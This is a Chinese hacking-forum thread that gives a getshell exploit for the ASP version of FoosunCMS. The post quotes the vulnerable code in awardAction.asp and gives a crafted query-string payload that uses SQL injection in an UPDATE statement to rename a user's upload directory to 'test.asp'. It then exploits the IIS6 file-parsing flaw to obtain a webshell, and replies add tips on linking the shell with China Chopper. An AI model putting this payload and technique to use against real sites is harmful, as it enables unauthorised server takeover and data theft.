风讯Cms的asp版本getshell

C4r1st · 发表于 2013-12-28 10:20:59

在文件\User\award\awardAction.asp中：

[AppleScript] 纯文本查看 复制代码

Integral=NoSqlHack(request.QueryString("Integral"))
 
if action="join" then
 
User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")")
 
'获得当前参加人数--------------------------------
 
User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")

请直接无视NoSqlHack,由于sql注入是发生在update语句中，所以我们可以修改表S_ME_Users的任意记录的任意字段信息

webshell还可以用来代替access

我们文件管理中上传个图片文件：

http://192.168.1.101/UserFiles/2 ... 7_01_10_0390446.jpg

UserNumber就是等于27015564I69

通过以上的sql注入漏洞，直接update为test.asp

http://192.168.1.101/User/award/ ... ID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1
2 (1).jpg

退出再重新登录

生成test.asp目录，后续上传的文件都会保存在该文件中

利用iis解析漏洞获取webshell

转自0day5

零点 · 发表于 2013-12-28 11:59:32

能否告知现在 4.0 sp7 怎么后台拿shell么？

mojitingliu · 发表于 2013-12-28 13:58:12

膜拜审计大牛

悲伤 · 发表于 2013-12-28 14:24:22

这个没太看懂

C4r1st · 发表于 2013-12-28 15:09:18

悲伤发表于 2013-12-28 14:24
这个没太看懂

利用iis解析漏洞getshell

悲伤 · 发表于 2013-12-28 16:19:17

C4r1st 发表于 2013-12-28 15:09
利用iis解析漏洞getshell

X.asp/X.jpg??

C4r1st · 发表于 2013-12-28 17:52:25

悲伤发表于 2013-12-28 16:19
X.asp/X.jpg??

是的。很对。

启帆 · 发表于 2013-12-29 09:28:07

对于iis7.5环境有什么办法么？

C4r1st · 发表于 2013-12-29 09:45:38

启帆发表于 2013-12-29 09:28
对于iis7.5环境有什么办法么？

iis6才有解析漏洞额～

mianhua · 发表于 2014-1-6 21:17:18

这个我知道登录后台新建目录就行也是这个原理解析为xx.asp;xx.jpg 菜刀链接就o k

风讯Cms的asp版本getshell

评分

点评

点评

点评

点评

指导单位

旗下站点

联系我们